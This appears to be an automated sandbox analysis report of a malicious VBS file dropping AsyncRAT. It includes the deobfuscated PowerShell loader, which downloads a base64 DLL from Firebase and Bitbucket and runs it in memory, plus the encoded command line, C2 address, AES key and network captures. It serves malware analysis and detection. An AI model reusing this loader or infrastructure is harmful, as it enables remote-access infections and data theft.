Analysis

  • max time kernel
    92s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 01:27

General

  • Target

    7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs

  • Size

    23.1MB

  • MD5

    c7b73269543ae666701b2d97172b93fb

  • SHA1

    e6d9435df4b136ceac144b84ec9b8fa7cfead13a

  • SHA256

    7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c

  • SHA512

    3cbd06d2e480e3b62f0881a51f7f94f797201de3b6053f1f6b7728c9e3467c24c5f58d5a2304d75487703ce496de9a5d4ee795cab6a08eefa45dc68324590287

  • SSDEEP

    1536:VPadPlP4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPm:8v

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$jrdur = "0"
2
$ouezs = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs"
3
[byte[]]$uefpj = [system.convert]::frombase64string((new-object net.webclient).downloadstring("https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe"))
4
(((([system.appdomain]::currentdomain).load($uefpj)).gettype("ClassLibrary3.Class1")).getmethod("ZxKHG")).invoke($null, [object[]]"txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth", $ouezs, "_____ertgqe__________________-------------", $jrdur, "1", "Roda")
5
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

zorra123.duckdns.org:2020

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
2QYF3nDwKGSugpGDsws0znXIALQRzwTn

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒HI▒Z▒B1▒HI▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒dQBl▒Ho▒cw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒ZQBm▒H▒▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒dQBl▒GY▒c▒Bq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwB1▒GU▒egBz▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒GU▒cgB0▒Gc▒cQBl▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒HI▒Z▒B1▒HI▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jrdur = '0';$ouezs = 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs';[Byte[]] $uefpj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uefpj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ouezs , '_____ertgqe__________________-------------', $jrdur, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:512
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
            PID:2648
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:436

    Network

    • flag-us
      DNS
      firebasestorage.googleapis.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      firebasestorage.googleapis.com
      IN A
      Response
      firebasestorage.googleapis.com
      IN A
      172.217.168.202
      firebasestorage.googleapis.com
      IN A
      142.251.39.106
      firebasestorage.googleapis.com
      IN A
      142.250.179.138
      firebasestorage.googleapis.com
      IN A
      172.217.23.202
      firebasestorage.googleapis.com
      IN A
      142.250.179.170
      firebasestorage.googleapis.com
      IN A
      142.251.36.42
      firebasestorage.googleapis.com
      IN A
      142.251.36.10
      firebasestorage.googleapis.com
      IN A
      142.250.179.202
      firebasestorage.googleapis.com
      IN A
      216.58.214.10
    • flag-nl
      GET
      https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
      powershell.exe
      Remote address:
      172.217.168.202:443
      Request
      GET /v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe HTTP/1.1
      Host: firebasestorage.googleapis.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Expires: Fri, 09 Aug 2024 01:27:26 GMT
      Date: Fri, 09 Aug 2024 01:27:26 GMT
      Cache-Control: private, max-age=0
      Last-Modified: Wed, 03 Jul 2024 14:08:24 GMT
      ETag: "5acaccbd879c3f61007eb990ca8b218a"
      x-goog-generation: 1720015704370424
      x-goog-metageneration: 1
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 12972
      x-goog-meta-firebaseStorageDownloadTokens: 61c829f6-e196-49e8-b4ff-041134577ffe
      Content-Type: text/plain
      Content-Disposition: inline; filename*=utf-8''dll%20Hope.txt
      x-goog-hash: crc32c=W9dNRw==
      x-goog-hash: md5=WsrMvYecP2EAfrmQyoshig==
      x-goog-storage-class: STANDARD
      Accept-Ranges: bytes
      Content-Length: 12972
      X-GUploader-UploadID: AHxI1nN9UiHrYcWyxVZXLqRlGAzPzQ8PbVMuRPf-GDQib2FUgol5EKoNmEiFt9twRNHZUFQj7bE
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-nl
      GET
      https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362
      powershell.exe
      Remote address:
      172.217.168.202:443
      Request
      GET /v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362 HTTP/1.1
      Host: firebasestorage.googleapis.com
      Response
      HTTP/1.1 200 OK
      Expires: Fri, 09 Aug 2024 01:27:26 GMT
      Date: Fri, 09 Aug 2024 01:27:26 GMT
      Cache-Control: private, max-age=0
      Last-Modified: Wed, 03 Jul 2024 14:01:52 GMT
      ETag: "943e47fb5db1e3ea3fd3dc15ea548bb9"
      x-goog-generation: 1720015312004933
      x-goog-metageneration: 1
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 26536
      x-goog-meta-firebaseStorageDownloadTokens: 7fe13398-6aa2-43e8-992c-35095e035362
      Content-Type: text/plain
      Content-Disposition: inline; filename*=utf-8''Pe%20Hope.txt
      x-goog-hash: crc32c=HduiyA==
      x-goog-hash: md5=lD5H+12x4+o/09wV6lSLuQ==
      x-goog-storage-class: STANDARD
      Accept-Ranges: bytes
      Content-Length: 26536
      X-GUploader-UploadID: AHxI1nNIwbBc25dxE9W2DJTPUsT34HoaPuu8T_VOYqlP1VaVDq9PNZ4LXXlMzysVR92j-pHB0-XJ_nk4Iw
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.dual-a-0034.a-msedge.net
      g-bing-com.dual-a-0034.a-msedge.net
      IN CNAME
      dual-a-0034.a-msedge.net
      dual-a-0034.a-msedge.net
      IN A
      204.79.197.237
      dual-a-0034.a-msedge.net
      IN A
      13.107.21.237
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 9004DF6BC08E439AA95AD5EE3AA57132 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
      date: Fri, 09 Aug 2024 01:27:25 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=3BA29E871DE267F8084F8A511C0266B4
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 6B30D7C49CDF4B51B75B716C2ADFD483 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
      date: Fri, 09 Aug 2024 01:27:25 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: B57495C9FED146DE8C65967521672062 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
      date: Fri, 09 Aug 2024 01:27:25 GMT
    • flag-us
      DNS
      202.168.217.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      202.168.217.172.in-addr.arpa
      IN PTR
      Response
      202.168.217.172.in-addr.arpa
      IN PTR
      ams16s32-in-f101e100net
    • flag-us
      DNS
      20.160.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      20.160.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      237.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      237.197.79.204.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      bitbucket.org
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      bitbucket.org
      IN A
      Response
      bitbucket.org
      IN A
      185.166.141.9
      bitbucket.org
      IN A
      185.166.141.8
      bitbucket.org
      IN A
      185.166.141.7
    • flag-gb
      GET
      https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txt
      powershell.exe
      Remote address:
      185.166.141.9:443
      Request
      GET /dcasdc/descargas/downloads/envionuevo.txt HTTP/1.1
      Host: bitbucket.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Date: Fri, 09 Aug 2024 01:27:26 GMT
      Content-Type: text/html; charset=utf-8
      Content-Length: 0
      Server: AtlassianEdge
      Location: https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      Expires: Fri, 09 Aug 2024 01:27:26 GMT
      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
      X-Used-Mesh: False
      Vary: Accept-Language, Origin
      Content-Language: en
      X-View-Name: bitbucket.apps.downloads.views.download_file
      X-Dc-Location: Micros-3
      X-Served-By: 94aa115e3b4c
      X-Version: d5ee04fb2c50
      X-Static-Version: d5ee04fb2c50
      X-Request-Count: 235
      X-Render-Time: 0.045334577560424805
      X-B3-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
      X-B3-Spanid: c70d8cfe88c24ed9
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
      X-Usage-Quota-Remaining: 999183.155
      X-Usage-Request-Cost: 830.20
      X-Usage-User-Time: 0.020761
      X-Usage-System-Time: 0.004145
      X-Usage-Input-Ops: 0
      X-Usage-Output-Ops: 0
      Age: 0
      X-Cache: MISS
      X-Content-Type-Options: nosniff
      X-Xss-Protection: 1; mode=block
      Atl-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
    • flag-us
      DNS
      bbuseruploads.s3.amazonaws.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      bbuseruploads.s3.amazonaws.com
      IN A
      Response
      bbuseruploads.s3.amazonaws.com
      IN CNAME
      s3-1-w.amazonaws.com
      s3-1-w.amazonaws.com
      IN CNAME
      s3-w.us-east-1.amazonaws.com
      s3-w.us-east-1.amazonaws.com
      IN A
      52.217.165.225
      s3-w.us-east-1.amazonaws.com
      IN A
      52.216.29.148
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.30.67
      s3-w.us-east-1.amazonaws.com
      IN A
      52.216.52.161
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.28.116
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.28.213
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.29.163
      s3-w.us-east-1.amazonaws.com
      IN A
      3.5.2.158
    • flag-us
      GET
      https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      powershell.exe
      Remote address:
      52.217.165.225:443
      Request
